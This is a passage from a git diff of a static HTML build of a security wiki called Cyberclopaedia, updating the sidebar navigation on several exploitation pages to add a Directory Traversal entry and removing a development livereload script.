        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -303,22 +303,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html index a2aa62b5..4d7be70b 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Protection Mechanisms.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -239,22 +239,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html index 336a9d57..bdd5989f 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return to _dl_resolve.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -265,22 +265,6 @@

Exploitation - - diff --git a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html index b6f479a8..5c6e837d 100644 --- a/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html +++ b/docs/Exploitation/Binary Exploitation/Stack Exploitation/Return-oriented programming (ROP).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
